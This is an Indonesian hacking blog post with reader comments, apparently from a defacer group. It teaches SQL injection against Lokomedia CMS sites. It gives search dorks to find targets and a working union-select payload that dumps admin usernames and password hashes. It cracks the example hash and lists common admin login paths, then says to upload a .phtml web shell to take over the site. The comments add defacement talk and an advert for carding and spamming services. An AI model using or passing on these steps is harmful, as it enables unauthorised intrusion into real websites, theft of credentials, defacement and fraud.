Hello World ; Siang Fans, Please Say Hello Haters :*
xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs, pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia nih, kite suntik2an dlu, *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja, kali aja masih
Langsung aje Tutorial SQL Injection on Lokomedia CMS .
Langsung intip tutor ;*
Dork : - inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(kembangin lagi gunakan otak bokepers Lu, biar dpt yg Vuln and Verawan gengs ;*)
eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
1. Dorking menggunakan Search Engine
2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
 |
| silahkan oprek2 sendiri Query yg pas utk Target agan |
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian ctrl+u untuk melihatnya lebih jelas.
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini
Untuk mengupload shell bisa dibagian Download, seperti ini
*Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3
eh sebelumnya add OA Line Kami yoo, kami bagi2in Tema Official TKJ Cyber Art loh: http://line.me/ti/p/%40hjl8740i
dah ah, gue mauu Bobo Ganteng dluu -> terus bangun pas Bedug awkkwa
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Suntikan Gengs :3
Sekian dan semoga bermanfaat .. terimakasih
Source and Thanks to: Bocah Berisik
./Nuenomaru
 |
| Awali Hari Lu dengan Secangkir Caffeine, dan Sentuhan Nikotin :) |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
59 comments
nganu mbah, makasih buat TKJ Cyber Art dan Blognya
saya sering pakai tutorialnya terus saya riset ualng dan saya ketik di blog http://garudasecurityhacker.blogspot.com
terus makasih juga buat motivasi gambar2 nya :)
maaf saya gak izin buat riset ulang tutor nya :(
Hahahha :* , santayyy bang :) .. Artikel kamii juga hasil riset ulang dri tutorial di web exploit dan web2 master tetangga kok :D .. Hahha yupzz gapapa kok gan ga izin , yg penting ss di artikel Hasill Live praktek agan sendiri ^_^ .. Kamii baakall terus support karya lu bang :) .. Haha tengkyu juga dah pantengin ini Blog . Dan yoii ambil kata2 positifnya aje di setiap tutor kamii . Yg berbau bokep di buang aje wkwkkw.. Salam sukses yo bang
kata-kata berbau vokep mah, buat penyegar aja bang, :D
biar kaga garing postingan nya :)
semangat juga bang bikin artikel selanjutnya
Salam Juga Dari Keluarga Kecil Garuda Security Hacker :)
Hahaha Sipp Bang :D
#Nuenomaru
Ajarin Gw Dong GAN masih New Bie nih :D
Gw Pusing Banget , Beljar Daface Ga Bisa" :'(
Para Mastah Yg Mau Berbagi Ilmu , Tlong Ajarin adik ini NgeDaface ,... Klo Mau Chat DiBBM :D12EA71F
Kami juge masih Belajar kok bang ..
#Nuenomaru
dah banyak exploit deface ada di web 0day dan exploit-DB, silahkan berkunjung dan pelajari disana.
jika ingin liat video exploitnye silahkan kunjungi youtube, kami juga masih belaajar , gak pantes menggurui..
#Nuenomaru
6ea092ee7f25229eb4aebabec9edff2cdc5e248440610594c493deaeb43a77226b8b9a539a043766c4cc9c851309c2bd04e6d8f86941d3ac99fd292ab5e76f80 itu artinya apa mastah :v
bang cara cari admin login nya gimana,selain di adminweb/ apa lagi bang soal nya saya cari di adminweb ga nemu malah error terus?
itu kode hash om, utk tau itu kode hash macam apa, silahkan cek artikel kami yg judulnya identifakasi hash..
atau silahkan encrypt and decrypt online di website hashkiller.
#Nuenomaru
silahkan cari tau tentang tool admin finder..
#Nuenomaru
Gan saya izin untuk copas artikel ente ya gan...terima kasih artikel nya bermanfaat... =. 404cybercrime.blogspot.com
seep , silahkan om..
tengkyuh juga dah berkunjung :)
#Nuenomaru
maztah koq sayah gagal login yah di cpanelnya padahal caranya sama kayagitu
emg user n pwnya sama kek utk login admin o.O ?
#Nuenomaru
kok gak bisa om
gak bisa apaan ??
#Nuenomaru
tkj cyber salam dari LCT & C0w0k t3rs4k1t1 t3am
sama minta dork donk gw ga bs ngembangin dork
akwkakwakkw >.< :v :v
iya ya deh,, salam balik juga yoo bang heheh
#Nuenomaru
maap bang :)
kami juga dah gak pernah maen lg,,gak ada dork fresh kami.
#Nuenomaru
bagai mana mbah cari admin ne ra iso
pakai tool aja om..
tool admin finder dah banyak kok yg ngembangin..
#Nuenomaru
izin copas ea..
www.ajay-alfredo.blogspot.com
siap gan
#Nuenomaru
siapa itu om ??
#Nuenomaru
bro kalau letaknya di /keep-crotz.html
nah, taruh exploitnya dimana tuh ?
akwkaka coba deh pertanyaannya lebih detail deh gan wkwkwk
#Nuenomaru
gan shell itu yang kayak gimana ya? :v
master merendah
#nuenomaru
nggak om :v ane beneran newbie di dunia hacking :)
Mazzter Dimas (-/\-)
#Nuenomaru
MANTAPPP
thanks
#Nuenomaru
Bang Shell itu Apa yak ?
#Newbie
Apa itu webshell/backdoor ?
webshell ini berisi sekumpulan script yang dapat mengeksekusi perintah shell, dengan webshell ini kita tidak perlu lagi login lewat halaman login, hanya cukup dengan mengeksekusi shell/backdoor tersebut, dengan begitu kita telah mempunyai kuasa selayaknya admin web (tidak100% hak seperti admin, karena mungkin chmod/permissions nya di kunci)
sekian :)
#Nuenomaru
KK Ditunggu kunjungan baliknya yaa :)
http://www.moderncoding.id/2017/02/deface-website-cms-balitbang-with-new.html >> Deface CMS Balitbang [ With New Exploiter ]
,http://www.moderncoding.id >> Website share tentang deface, hacking , programming, web development, dan masih banyak lagi tentang teknologi :)
,
Salam Dari Garuda Security Hacker kk :)
coba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
terima kasih.
awkawkka >..<
masih pemula kak, buat pentest ora ngarti aku.
#Nuenomaru
keren nih web, ngakak yg kelola nih web, wkwkwk berkarya teross
makasih juga dah support kami.
makasih juga sudah baca2 artikel kami.
semoga sukses terus.
#Nuenomaru
makasih blognya mastah2 TKJ Cyber Art & Garuda Security Hacker, tutorialnya sering ane pake sama ane share di blog ane. mampir juga stah http://n45ht.web.id :)
hheheh slow kak, iya aku dah baca beberapa artikel di blog ente kak,.
semangat trs karyanya kak, keep share ^_^
semoga sukses hehehe
#Nuenomaru
Bang -_- nilai ane kecil trus smnjk nntn bokep :'v .. deface smua web bokep dong bang :'v
super sekali
#Nuenomaru
popoji v 2.0.1 udah bisa di deface gan?...
kok rata2 admin loginnya ga sesuai ya bang
gua gak terlalu ngikutin perkembangan cms awkwaka, kurang tau jadinya gan
#Nuenomaru
keknya passwordnya deh yang ente salah hash
#Nuenomaru
kalo mau masuk cpanel nya gimana om?
Kadang ada web yang pakai CMS lokomedia yang bisa login ke halaman admin tapi gak bisa upload apa2 gara2 gak ada permission dari server.
gak semua vuln ya bang . ane sudh dapat username & pass nya eh malah gk bisa masuk halaman admin :v , ane sudh pake dork fres ttp aja :v
gak bisa akses adminnya
Dorknya udh gk fresh :-(
kunbal yo
http://bluray45.blogspot.com
keren gan,, kunjungi juga website
www.rabiitch.ga
- carding paypal
- carding bitcoin
- carding ebay
- carding amazon
- spammer
- defacer
- Tutorial
- Website Order
- Daily
- Blackhat
- Got Money Fast
DLL
EmoticonEmoticon